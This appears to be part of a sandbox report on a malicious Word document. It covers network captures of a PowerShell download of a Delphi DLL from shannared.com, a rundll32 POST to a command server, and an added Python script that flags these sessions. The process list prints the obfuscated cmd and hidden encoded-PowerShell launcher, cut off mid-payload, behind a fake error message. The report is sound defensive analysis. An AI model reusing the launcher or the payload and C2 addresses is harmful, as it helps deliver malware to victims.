                                          Jan 26, 2021 13:33:16.014595985 CET  49167         80          192.168.2.22     192.169.223.13
                                          Jan 26, 2021 13:33:16.014606953 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:16.014615059 CET  49167         80          192.168.2.22     192.169.223.13
                                          Jan 26, 2021 13:33:16.014636993 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:16.014662027 CET  49167         80          192.168.2.22     192.169.223.13
                                          Jan 26, 2021 13:33:16.014688969 CET  49167         80          192.168.2.22     192.169.223.13
                                          Jan 26, 2021 13:33:16.014954090 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:16.014983892 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:16.015021086 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:16.015024900 CET  49167         80          192.168.2.22     192.169.223.13
                                          Jan 26, 2021 13:33:16.015047073 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:16.015085936 CET  49167         80          192.168.2.22     192.169.223.13
                                          Jan 26, 2021 13:33:16.015177011 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:16.015204906 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:16.015230894 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:16.015254021 CET  49167         80          192.168.2.22     192.169.223.13
                                          Jan 26, 2021 13:33:16.015258074 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:16.015305996 CET  49167         80          192.168.2.22     192.169.223.13
                                          Jan 26, 2021 13:33:16.016339064 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:16.016371012 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:16.016398907 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:16.016422033 CET  49167         80          192.168.2.22     192.169.223.13
                                          Jan 26, 2021 13:33:16.016427994 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:16.016480923 CET  49167         80          192.168.2.22     192.169.223.13
                                          Jan 26, 2021 13:33:16.016882896 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:16.016910076 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:16.016947985 CET  49167         80          192.168.2.22     192.169.223.13
                                          Jan 26, 2021 13:33:16.202141047 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:16.202169895 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:16.202284098 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:16.202306986 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:16.202342033 CET  49167         80          192.168.2.22     192.169.223.13
                                          Jan 26, 2021 13:33:16.202363968 CET  49167         80          192.168.2.22     192.169.223.13
                                          Jan 26, 2021 13:33:16.202749014 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:16.202775955 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:16.202821016 CET  49167         80          192.168.2.22     192.169.223.13
                                          Jan 26, 2021 13:33:16.203188896 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.203258038 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.203353882 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.203381062 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.203454971 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.204390049 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.204421043 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.204463959 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.206257105 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.206280947 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.206341028 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.206413031 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.207401991 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.207477093 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.393843889 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.394006014 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.394032001 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.394057035 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.394171000 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.394207954 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.395272017 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.395303011 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.395325899 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.395347118 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.395368099 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.395386934 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.395473003 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.395512104 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.395719051 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.395745993 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.395770073 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.395785093 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.395793915 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.395802021 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.396123886 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.396147966 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.396173000 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.396187067 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.396197081 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.396291971 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.396433115 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.396450996 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.396491051 CET8049167192.169.223.13192.168.2.22

                                          UDP Packets

                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                          Jan 26, 2021 13:33:15.146056890 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                                          Jan 26, 2021 13:33:15.206913948 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22

                                          DNS Queries

                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                          Jan 26, 2021 13:33:15.146056890 CET | 192.168.2.22 | 8.8.8.8 | 0xb648 | Standard query (0) | shannared.com | A (IP address) | IN (0x0001)

                                          DNS Answers

                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                          Jan 26, 2021 13:33:15.206913948 CET | 8.8.8.8 | 192.168.2.22 | 0xb648 | No error (0) | shannared.com | (none) | 192.169.223.13 | A (IP address) | IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • shannared.com
                                          • 217.160.169.110
                                            • 217.160.169.110:8080

                                          HTTP Packets

                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          0 | 192.168.2.22 | 49167 | 192.169.223.13 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Jan 26, 2021 13:33:15.412739992 CET | 0 | OUT | GET /content/lhALeS/ HTTP/1.1
                                          Host: shannared.com
                                          Connection: Keep-Alive
                                          Jan 26, 2021 13:33:15.826479912 CET | 1 | IN | HTTP/1.1 200 OK
                                          Cache-Control: no-cache, must-revalidate
                                          Pragma: no-cache
                                          Expires: Tue, 26 Jan 2021 12:33:15 GMT
                                          Content-Disposition: attachment; filename="O9TGnKaUCw.dll"
                                          Content-Transfer-Encoding: binary
                                          Set-Cookie: 60100c0bb399f=1611664395; expires=Tue, 26-Jan-2021 12:34:15 GMT; Max-Age=60; path=/
                                          Last-Modified: Tue, 26 Jan 2021 12:33:15 GMT
                                          X-XSS-Protection: 1; mode=block
                                          X-Content-Type-Options: nosniff
                                          Content-Type: application/octet-stream
                                          X-Cacheable: YES:Forced
                                          Content-Length: 631808
                                          Accept-Ranges: bytes
                                          Date: Tue, 26 Jan 2021 12:33:15 GMT
                                          Age: 0
                                          Vary: User-Agent
                                          X-Cache: uncached
                                          X-Cache-Hit: MISS
                                          X-Backend: all_requests
                                          Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 30 06 00 00 70 03 00 00 00 00 00 bc 3e 06 00 00 10 00 00 00 40 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 ec 22 00 00 00 10 07 00 00 c6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 d4 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 e8 2e 06 00 00 10 00 00 00 30 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 cc 14 00 00 00 40 06 00 00 16 00 00 00 34 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 d1 0c 00 00 00 60 06 00 00 00 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 22 00 00 00 70 06 00 00 24 00 00 00 4a 06 00 00 
00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d4 6e 00 00 00 a0
                                          Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*0p>@@p"nCODE.0 `DATA@4@BSS`J.idata"p$J@.relocn


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          1 | 192.168.2.22 | 49171 | 217.160.169.110 | 8080 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Jan 26, 2021 13:34:31.620852947 CET | 669 | OUT | POST /zrm2/7son14/mlqmfbi2uji6/ HTTP/1.1
                                          DNT: 0
                                          Referer: 217.160.169.110/zrm2/7son14/mlqmfbi2uji6/
                                          Content-Type: multipart/form-data; boundary=--------orf6DU5u
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Host: 217.160.169.110:8080
                                          Content-Length: 5748
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Jan 26, 2021 13:34:31.893688917 CET | 676 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Tue, 26 Jan 2021 12:34:31 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 61 33 34 0d 0a db 7a 32 2c 0e a8 38 d9 2d 84 5e b9 b0 23 46 ca 80 52 0c d9 a0 88 b2 e8 cc 5a 45 13 ab 84 5f 15 22 67 da 93 c4 d5 f2 7c 11 33 91 e4 7c 20 61 73 69 34 91 bb b4 54 75 26 d7 30 b3 a8 71 ca ea 6e 04 44 8b f1 2f b8 98 ee cd f7 a0 40 32 74 7c da 68 74 73 24 4b 63 f6 15 a9 21 bd 5b 3e 2b 93 a1 a6 f1 f8 ca c6 77 6e 3e 1b c0 31 26 3f 88 d0 be 56 f2 24 c4 43 e8 10 01 5f 40 65 1d 3c a9 cb 1d f6 e1 96 26 79 c6 8b 98 d8 99 a5 74 c4 44 d1 c3 c7 3a c7 ad 94 b5 e0 60 aa 8e ba c2 2e 48 a9 8c a9 bb b9 04 a0 3f 1f 5d 40 b1 41 c6 e8 d1 e2 e6 eb dc e5 90 59 a7 08 26 99 3c c3 dd 6b 52 d9 46 06 ef 92 2f 8b b1 db e1 65 6a 3d fa b9 1f 93 8a b2 fe 81 ed 07 5d f8 d0 31 c7 4c 59 27 ec 51 8e ac fa 86 21 cb 6c 47 43 70 8a 0a ae cd a4 fa b1 69 da 88 d5 79 1f 20 60 23 ad 31 ea b0 14 35 b1 ac 80 9b 21 ed dc d9 3b 6b 17 23 0b 6f d3 ae cf b4 8f d5 ad 98 be 50 30 1d 28 cb de d3 a1 b4 e4 b2 9f db ad c0 40 4c 34 4f 41 f2 fd f7 59 40 64 ca bb 91 9c c7 ce 82 9e 1a 67 48 a7 df 17 84 b6 24 84 c6 a3 73 a2 44 83 54 2e d8 48 b3 fc 9c bb 09 26 47 3f da 1a 96 1b 0a a6 93 ce 1c 32 5a 25 57 fe 98 17 23 37 32 b5 e7 76 a9 9c 3e 8d 86 2f 1e ec e3 6b 2f 23 1c 47 b6 8d 05 9c 9c d6 d1 95 c3 10 d5 45 76 5e 56 ef 30 45 d4 da 9f 36 9f e3 54 91 5a 50 0b f5 06 55 bb ce 3a 4b 20 f1 6e 65 fa 79 46 c8 7c 89 f8 39 aa 4f 14 69 39 a7 a1 96 68 95 d8 e2 ba ed 72 b7 b9 d0 02 d7 41 c6 b1 1c ae 95 77 42 83 de bc 88 b8 8f ea 6e 3a e2 85 f1 cf 34 e6 5d ae b1 81 8a 2c 9e 74 38 56 b8 18 8f ac dc 50 a0 47 ce 4f 73 04 bb 23 92 94 c4 d0 22 b5 fd bb 66 ff 46 fd 90 c1 c0 80 37 c7 ee 66 cc c8 40 b5 e6 d3 04 59 fd 3f 10 64 b3 3b 4b 7f ac d2 2c f5 b0 34 82 b3 a7 82 f8 00 e7 91 82 17 9d 24 97 ec da 42 74 bb b6 fd 70 03 e9 a6 16 c0 dd ac 37 ea 6e 9c 38 4d 5b 98 c8 06 ab bd 6e aa a0 dc 8b 6b cd 09 b0 21 d7 b2 6d b7 86 90 66 81 b5 a9 c8 d7 bb d4 53 1b 5c ce 2c 09 79 82 d0 a5 29 97 f7 38 2b 6b 5a 29 69 bc cc 48 36 fc f5 2c 9c aa c9 61 a2 af 43 c0 0c 43 c6 fa c1 51 c1 4e 04 ed 3e 74 a2 
47 82 7f 86 dc 75 3b ff 7b c4 50 72 3c 74 db fa 4e 89 92 ff bc 61 f8 3a 48 aa ef 8b 1e 3c 0f 3d 06 e0 3f b6 b4 25 07 00 92 99 a1 7f 2e 92 56 13 aa 40 1a ec 11 0b 62 6e 23 6f 3f 9b d1 8b 72 62 b3 30 d1 d8 5b 6c c2 ce b5 a2 e4 b1 38 9c d5 7e 4b b3 6a ce 75 f6 e0 34 05 43 7e 7f 96 cf d9 a2 b6 38 69 99 7a 87 8b b6 cb 72 a5 3c 01 39 45 93 e4 9f 65 bb e4 c3 a4 a9 b9 6e a2 82 3c 7b 78 ea 9e e2 7b 58 57 f6 87 8d a9 f1 f1 b3 25 a4 1c 08 31 dd 68 d9 36 18 c6 bc f8 50 9f e2 3d c5 5a 1e 4c 5c da 2d 85 c2 15 3b 48 98 7b fe d5 68 88 b6 d0 dc 1f da ef a5 03 2a 70 6d a1 fc 2e b6 e8 4f 72 dc 4f 27 88 17 69 35 10 9e a0 45 bb f9 9e b6 76 2c 95 03 45 0b 6c 5b d9 9c c3 9e 30 c8 e0 a1 6a 37 9f 12 da 22 87 dd bd 64 3b 42 10 79 33 6e 67 8b d2 49 2e 47 d1 e7 9c 9f 58 c2 c5 54 1d 87 af a2 48 66 37 17 28 13 d9 55 88 d9 ba 94 e5 c6 64 55 51 a7 79 b7 82 4a e4 c0 28 93 fa 0d fd b0 87 16 82 d3 60 22 78 b1 a9 69 c7 e5 50 03 7a eb 1b 59 1a bc 47 e4 ca 78 e5 4b f9 26 8b b7 03 1c 50 b2 60 7c 2b d6 b7 f6 10 34 6d 66 7b 04 d0 21 97 bb 8a d6 77 d4 50 3d 59 68 23 4b cb fb fa 13 db df cf fd f7 b6 95 1c ec 77 8c f1 85 8b 4b b8 97 c1 21 4a e4 36 1c e0 b6 0a 59 77 e3 06 8b c2 9b 96 83 b4 ce 36 35 84 8e 28 e0 b7 b9 2b d6 c1 73 42 95 ed 56 40 de 76 e8 12 62 d5 95 34 85 2f d2 70 70 a1 5b f0 45 67 ad 3e bf a2 2b 9b b0 2f 75 7a 4c 64 5e 7a 15 90 0c 31 79 74 7d 30 a3 b8 a8 39 c1 88 4c 25 06 78 73 81 98 93 be e4 54 11 13 1f e6 82 a7 3b 18 a6 b7 4c 36 3a 87 24 25 4d 11 0f 31 03 eb aa 57 3e cf 56 06 91 dc d2 7e 5f 9f cc ea af 65 4e b2
                                          Data Ascii: a34z2,8-^#FRZE_"g|3| asi4Tu&0qnD/@2t|hts$Kc![>+wn>1&?V$C_@e<&ytD:`.H?]@AY&<kRF/ej=]1LY'Q!lGCpiy `#15!;k#oP0(@L4OAY@dgH$sDT.H&G?2Z%W#72v>/k/#GEv^V0E6TZPU:K neyF|9Oi9hrAwBn:4],t8VPGOs#"fF7f@Y?d;K,4$Btp7n8M[nk!mfS\,y)8+kZ)iH6,aCCQN>tGu;{Pr<tNa:H<=?%.V@bn#o?rb0[l8~Kju4C~8izr<9Een<{x{XW%1h6P=ZL\-;H{h*pm.OrO'i5Ev,El[0j7"d;By3ngI.GXTHf7(UdUQyJ(`"xiPzYGxK&P`|+4mf{!wP=Yh#KwK!J6Yw65(+sBV@vb4/pp[Eg>+/uzLd^z1yt}09L%xsT;L6:$%M1W>V~_eN
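The two sessions above show the whole delivery chain on the wire: powershell.exe fetches a file that the server labels O9TGnKaUCw.dll and that opens with an MZ header and the Delphi DOS stub, and 76 seconds later the 32-bit rundll32.exe posts a multipart body to an IP-literal host on port 8080. The Python below is an added example, not part of the Joe Sandbox report or of Joe Security's tooling. It parses the captured PE header and runs request- and response-side heuristics over both sessions. The header dictionaries and hex bytes are copied from the report; the zero padding between the DOS stub and the NT headers is regenerated rather than transcribed, and the tag names, the Delphi timestamp constant and the process-name sets are the example's own assumptions.

```python
"""Triage of the two HTTP sessions captured above (added example, not part of the report)."""
import ipaddress
import re
import struct

DELPHI_TIMESTAMP = 0x2A425E19          # link time that Borland/Delphi stamps into every image
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
LOADERS = {"rundll32.exe", "regsvr32.exe"}


def hexdump_to_bytes(dump: str) -> bytes:
    """Convert a Joe Sandbox 'Data Raw' hex dump to bytes."""
    return bytes.fromhex("".join(dump.split()))


# Session 0 response body as captured: MZ header plus the Delphi DOS stub (offsets 0x00-0x77) ...
DOS_PART = hexdump_to_bytes("""
4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00  b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00
ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90  54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73
74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57  69 6e 33 32 0d 0a 24 37""")
# ... and the NT headers at e_lfanew 0x100, up to DllCharacteristics. The zero padding between the
# two is regenerated rather than transcribed, so SESSION0_BODY is a faithful 352-byte file prefix.
NT_PART = hexdump_to_bytes("""
50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00  00 00 00 00 e0 00 8e a1 0b 01 02 19 00 30 06 00
00 70 03 00 00 00 00 00 bc 3e 06 00 00 10 00 00  00 40 06 00 00 00 40 00 00 10 00 00 00 02 00 00
04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00  00 e0 09 00 00 04 00 00 00 00 00 00 02 00 01 00""")
SESSION0_BODY = DOS_PART + bytes(0x100 - len(DOS_PART)) + NT_PART

# Process names and headers of both sessions, copied from the report.
SESSION0_PROC = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SESSION0_REQ = {"Host": "shannared.com", "Connection": "Keep-Alive"}
SESSION0_RESP = {"Content-Disposition": 'attachment; filename="O9TGnKaUCw.dll"',
                 "Content-Type": "application/octet-stream", "Content-Length": "631808"}
SESSION1_PROC = r"C:\Windows\SysWOW64\rundll32.exe"
SESSION1_REQ = {"DNT": "0", "Referer": "217.160.169.110/zrm2/7son14/mlqmfbi2uji6/",
                "Content-Type": "multipart/form-data; boundary=--------orf6DU5u",
                "User-Agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; "
                              ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
                "Host": "217.160.169.110:8080", "Content-Length": "5748"}


def parse_pe_header(data: bytes) -> dict:
    """Read the MZ/PE header fields needed for triage; raise ValueError if this is not a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    machine, nsections, stamp, _, _, _, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24                                   # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x20B:                                    # PE32+: 8-byte ImageBase at +24
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:                                                 # PE32: BaseOfData at +24, ImageBase at +28
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    return {"machine": machine, "sections": nsections, "timestamp": stamp, "magic": magic,
            "is_dll": bool(chars & 0x2000), "image_base": image_base,     # 0x2000 = IMAGE_FILE_DLL
            "entry_point": struct.unpack_from("<I", data, opt + 16)[0],
            "subsystem": struct.unpack_from("<H", data, opt + 68)[0]}


def triage_request(process: str, method: str, path: str, headers: dict) -> list:
    """Request-side heuristics, returned as (tag, detail) pairs."""
    exe, out = process.rsplit("\\", 1)[-1].lower(), []
    host, _, port = headers.get("Host", "").partition(":")
    port = int(port) if port else 80
    if exe in SCRIPT_HOSTS | LOADERS:
        out.append(("script-host-http", exe))
    if "User-Agent" not in headers:                       # System.Net.WebClient sends none by default
        out.append(("no-user-agent", exe))
    try:
        ipaddress.ip_address(host)
        out.append(("ip-literal-host", host))
    except ValueError:
        pass
    if port not in (80, 443):
        out.append(("non-standard-port", port))
    if exe in LOADERS and method == "POST":
        out.append(("loader-post", path))
    if headers.get("Content-Type", "").startswith("multipart/form-data") and exe != "iexplore.exe":
        out.append(("form-upload-from-non-browser", exe))
    if headers.get("Referer") == host + path:             # the bot mirrors its own URL into Referer
        out.append(("self-referer", headers["Referer"]))
    return out


def triage_response(process: str, headers: dict, body: bytes) -> list:
    """Response-side heuristics for a download observed from `process`."""
    exe, out = process.rsplit("\\", 1)[-1].lower(), []
    m = re.search(r'filename="?([^";]+)', headers.get("Content-Disposition", ""))
    if m and m.group(1).lower().endswith((".dll", ".exe", ".scr", ".ocx")):
        out.append(("executable-attachment", m.group(1)))
    try:
        pe = parse_pe_header(body)
    except ValueError:
        return out
    out.append(("pe-body", "PE32+" if pe["magic"] == 0x20B else "PE32"))
    if pe["is_dll"]:
        out.append(("pe-dll", "expect rundll32/regsvr32 next" if exe in SCRIPT_HOSTS else exe))
    if pe["timestamp"] == DELPHI_TIMESTAMP:
        out.append(("delphi-timestamp", hex(pe["timestamp"])))
    return out
```

On the captured bytes, parse_pe_header reports a PE32 DLL for i386 with six sections, entry point 0x63ebc, image base 0x400000, a GUI subsystem and the TimeDateStamp 0x2a425e19 that every Delphi-linked image carries, which matches the "Programmed in: Borland Delphi" line the report gives for the rundll32 hosts. The request heuristics are deliberately coarse: a missing User-Agent, an IP-literal Host on a non-standard port, a POST from rundll32.exe and a Referer equal to the request's own URL are each weak alone and are meant to be counted together, not alerted on individually.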


                                          Code Manipulations

                                          Statistics

                                          Behavior

                                          System Behavior

                                          General

                                          Start time:13:32:40
                                          Start date:26/01/2021
                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                          Imagebase:0x13f790000
                                          File size:1424032 bytes
                                          MD5 hash:95C38D04597050285A18F66039EDB456
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:13:32:42
                                          Start date:26/01/2021
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0A